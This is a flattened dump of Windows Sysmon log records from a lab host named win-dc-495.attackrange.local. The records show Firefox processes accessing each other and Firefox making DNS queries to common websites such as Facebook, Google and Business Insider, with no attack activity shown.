Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.042{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.038{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.037{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.037{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.644{59A5CD1D-945A-6005-3305-00000000A301}7052scontent.xx.fbcdn.net0157.240.20.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.643{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com0::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.643{59A5CD1D-945A-6005-3305-00000000A301}7052static.xx.fbcdn.net0type: 5 scontent.xx.fbcdn.net;::ffff:157.240.20.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.484{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de02606:4700:10::6816:429a;2606:4700:10::6816:439a;2606:4700:10::ac43:1d74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.481{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de0172.67.29.116;104.22.66.154;104.22.67.154;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.480{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de0::ffff:104.22.67.154;::ffff:172.67.29.116;::ffff:104.22.66.154;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464118.23.217.172.in-addr.arpa.0type: 12 mil04s23-in-f22.1e100.net;type: 12 mil04s23-in-f118.1e100.net;type: 12 fra16s45-in-f22.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}246474.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f10.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464174.16.217.172.in-addr.arpa.0type: 12 fra15s11-in-f174.1e100.net;type: 12 fra15s11-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}246459.253.4.64.in-addr.arpa.0type: 12 pulsproxy-web-public-1-1-lvsaz03.ebay.com;C:\Windows\sysmon64.exe 22542200x800000000000000017548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.893{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com02a00:1450:4001:817::200d;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.892{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com0172.217.21.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.891{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com0::ffff:172.217.21.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.688{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com02a00:1450:4001:808::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.686{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0216.58.207.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.686{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0::ffff:216.58.207.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.213{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com02a00:1450:4001:816::2016;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.211{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com0172.217.23.118;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.397{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.397{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.396{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.002{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.736{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.731{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.731{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.932{59A5CD1D-8E56-6005-2E00-00000000A301}246419.20.240.157.in-addr.arpa.0type: 12 xx-fbcdn-shv-02-frt3.fbcdn.net;C:\Windows\sysmon64.exe 22542200x800000000000000017573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464205.21.217.172.in-addr.arpa.0type: 12 fra16s12-in-f205.1e100.net;type: 12 fra16s12-in-f13.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.646{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.645{59A5CD1D-945A-6005-3305-00000000A301}7052scontent.xx.fbcdn.net02a03:2880:f01c:8012:face:b00c:0:3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.644{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.704{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.700{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.699{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.382{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.382{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.353{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 